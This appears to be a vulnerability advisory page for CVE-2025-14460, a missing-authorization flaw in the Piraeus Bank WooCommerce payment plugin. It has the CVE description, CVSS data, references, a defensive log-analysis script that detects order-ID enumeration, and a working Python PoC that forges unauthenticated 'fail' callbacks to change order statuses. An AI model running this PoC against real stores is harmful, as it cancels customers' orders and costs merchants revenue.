Security Vulnerability Report
CVE-2025-14460 CVSS 5.3 MEDIUM

CVE-2025-14460

Published: 2026-01-07 12:16:55
Last Modified: 2026-04-15 00:35:42

Description

The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to unauthorized order status modification in all versions up to, and including, 3.1.4. This is due to missing authorization checks on the payment callback endpoint handler when processing the 'fail' callback from the payment gateway. This makes it possible for unauthenticated attackers to change any order's status to 'failed' via the publicly accessible WooCommerce API endpoint by providing only the order ID (MerchantReference parameter), which can be easily enumerated as order IDs are sequential integers. This can cause significant business disruption including canceled shipments, inventory issues, and loss of revenue.
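The description above gives defenders a concrete signature: a single client hitting the plugin's WC-API callback route many times in a short window, or supplying MerchantReference values that walk through consecutive order IDs. The Python script below is an added detection example, not code from the original report or from the plugin, that runs that logic over web-server access logs. The callback slug is the one the PoC on this page targets; the log lines, IP addresses, timestamps and order IDs are constructed for the example. When the order ID is sent only in the POST body, as the PoC does, the access log will not contain it, so the script keeps the rate signal independent of the MerchantReference signal.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines in combined log format (not real traffic).
# The first six model an attacker enumerating order IDs 1001..1006 from one IP;
# the last two model a real shopper returning from the gateway after checkout.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Jan/2026:12:00:01 +0000] "POST /?wc-api=wc_piraeusbank_gateway&MerchantReference=1001 HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [07/Jan/2026:12:00:02 +0000] "POST /?wc-api=wc_piraeusbank_gateway&MerchantReference=1002 HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [07/Jan/2026:12:00:02 +0000] "POST /?wc-api=wc_piraeusbank_gateway&MerchantReference=1003 HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [07/Jan/2026:12:00:03 +0000] "POST /?wc-api=wc_piraeusbank_gateway&MerchantReference=1004 HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [07/Jan/2026:12:00:04 +0000] "POST /?wc-api=wc_piraeusbank_gateway&MerchantReference=1005 HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [07/Jan/2026:12:00:05 +0000] "POST /?wc-api=wc_piraeusbank_gateway&MerchantReference=1006 HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.20 - - [07/Jan/2026:12:05:00 +0000] "GET /checkout/ HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
198.51.100.20 - - [07/Jan/2026:12:05:40 +0000] "POST /?wc-api=wc_piraeusbank_gateway&MerchantReference=1007 HTTP/1.1" 200 512 "https://gateway.example/return" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
CALLBACK_SLUG = "wc_piraeusbank_gateway"  # slug used by the PoC on this page


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["query"] = parse_qs(urlsplit(rec["target"]).query)
    return rec


def is_callback(rec):
    """True if the request targets the plugin's WC-API callback route.
    The comparison is case-insensitive because the wc-api value is matched loosely."""
    return any(v.lower() == CALLBACK_SLUG for v in rec["query"].get("wc-api", []))


def merchant_reference(rec):
    """Order ID from the query string, or None when it travelled only in the POST body
    (access logs do not record bodies, so callers must not depend on this value)."""
    vals = rec["query"].get("MerchantReference")
    return int(vals[0]) if vals and vals[0].isdigit() else None


def max_in_window(timestamps, window):
    """Largest number of events that fall inside any sliding window of length `window`."""
    ts = sorted(timestamps)
    best = lo = 0
    for hi in range(len(ts)):
        while ts[hi] - ts[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def longest_consecutive_run(values):
    """Length of the longest run of consecutive integers, e.g. [1001..1006] -> 6."""
    s = set(values)
    best = 0
    for v in s:
        if v - 1 not in s:  # v starts a run
            n = 1
            while v + n in s:
                n += 1
            best = max(best, n)
    return best


def detect_callback_abuse(log_text, window=timedelta(minutes=5), rate_threshold=5, run_threshold=3):
    """Return one alert per client IP whose callback traffic looks like order-ID enumeration:
    too many callback hits inside one window, or a run of consecutive MerchantReference values.
    A real shopper produces one callback per checkout, so both thresholds are deliberately low."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_callback(rec):
            per_ip[rec["ip"]].append((rec["ts"], merchant_reference(rec)))

    alerts = []
    for ip, events in per_ip.items():
        burst = max_in_window([t for t, _ in events], window)
        refs = [r for _, r in events if r is not None]
        run = longest_consecutive_run(refs)
        if burst >= rate_threshold or run >= run_threshold:
            alerts.append({"ip": ip, "callbacks": len(events), "burst": burst, "sequential_run": run})
    return alerts


if __name__ == "__main__":
    for alert in detect_callback_abuse(SAMPLE_LOG):
        print(alert)
```

On the sample data only 203.0.113.7 is flagged (six callbacks in four seconds, order IDs 1001 through 1006). The Referer header is deliberately not used as a signal: a forged callback can set any Referer it likes, whereas request rate and ID sequence are properties of the enumeration itself. In production, pair the alert with a check of the WooCommerce order notes for orders that flipped to "failed" without a matching gateway transaction.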

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)

No CPE configuration data is available from NVD (vulnerability status: Deferred). Affected product per the advisory:

Piraeus Bank WooCommerce Payment Gateway <= 3.1.4 (fixed in the release following 3.1.4; see the changeset in References)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-14460 PoC
# Unauthenticated order status modification in Piraeus Bank WooCommerce Payment Gateway <= 3.1.4

TARGET_URL = "http://vulnerable-site.com/"  # Replace with the target URL (keep the trailing slash)
API_ENDPOINT = "?wc-api=wc_piraeusbank_gateway"  # WooCommerce WC-API callback route handled by the plugin


def exploit(order_id):
    """Send a forged 'fail' callback for the given order without any authentication.

    The advisory names only MerchantReference (the sequential order ID) as the value the
    attacker must supply; the remaining field names below are this PoC's own assumptions
    about the gateway's callback format.
    """
    url = f"{TARGET_URL}{API_ENDPOINT}"
    data = {
        "MerchantReference": str(order_id),  # Sequential WooCommerce order ID
        "StatusId": "fail",                  # Trigger the 'fail' branch of the callback handler
        "ErrorCode": "0",
        "ErrorMessage": "Payment Failed",
    }
    # Unauthenticated request: the vulnerable handler performs no authorization check
    response = requests.post(url, data=data, timeout=10)
    return response.status_code, response.text


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <order_id>")
        print("Example: python exploit.py 1234")
        sys.exit(1)
    order_id = sys.argv[1]
    print(f"[*] Targeting order ID: {order_id}")
    status, resp = exploit(order_id)
    print(f"[*] Response Status: {status}")
    if status == 200:
        # An HTTP 200 only shows the callback route answered; confirm the change on the
        # order itself (e.g. in the WooCommerce admin) before treating it as a success.
        print("[+] Callback accepted; verify the order now shows status 'failed'")
    else:
        print("[-] Exploitation failed")
```

References

Vulnerable handler in the last affected release: https://plugins.trac.wordpress.org/browser/woo-payment-gateway-for-piraeus-bank/tags/3.1.4/classes/WC_Piraeusbank_Gateway.php#L821
Current handler in trunk: https://plugins.trac.wordpress.org/browser/woo-payment-gateway-for-piraeus-bank/trunk/classes/WC_Piraeusbank_Gateway.php#L821
Fixing changeset: https://plugins.trac.wordpress.org/changeset/3439515/
Wordfence advisory: https://www.wordfence.com/threat-intel/vulnerabilities/id/d7b15198-8f44-4390-862b-35d41eb8a854?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14460",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-07T12:16:54.903",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to unauthorized order status modification in all versions up to, and including, 3.1.4. This is due to missing authorization checks on the payment callback endpoint handler when processing the 'fail' callback from the payment gateway. This makes it possible for unauthenticated attackers to change any order's status to 'failed' via the publicly accessible WooCommerce API endpoint by providing only the order ID (MerchantReference parameter), which can be easily enumerated as order IDs are sequential integers. This can cause significant business disruption including canceled shipments, inventory issues, and loss of revenue."
      },
      {
        "lang": "es",
        "value": "El plugin de pasarela de pago WooCommerce de Piraeus Bank para WordPress es vulnerable a la modificación no autorizada del estado de los pedidos en todas las versiones hasta la 3.1.4, inclusive. Esto se debe a la falta de comprobaciones de autorización en el manejador del endpoint de devolución de llamada de pago al procesar la devolución de llamada 'fail' de la pasarela de pago. Esto hace posible que atacantes no autenticados cambien el estado de cualquier pedido a 'failed' a través del endpoint de la API de WooCommerce de acceso público, proporcionando solo el ID del pedido (parámetro MerchantReference), que puede ser fácilmente enumerado ya que los IDs de los pedidos son enteros secuenciales. Esto puede causar una interrupción significativa del negocio, incluyendo envíos cancelados, problemas de inventario y pérdida de ingresos."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-862"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/woo-payment-gateway-for-piraeus-bank/tags/3.1.4/classes/WC_Piraeusbank_Gateway.php#L821", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/woo-payment-gateway-for-piraeus-bank/trunk/classes/WC_Piraeusbank_Gateway.php#L821", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3439515/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d7b15198-8f44-4390-862b-35d41eb8a854?source=cve", "source": "[email protected]"}
    ]
  }
}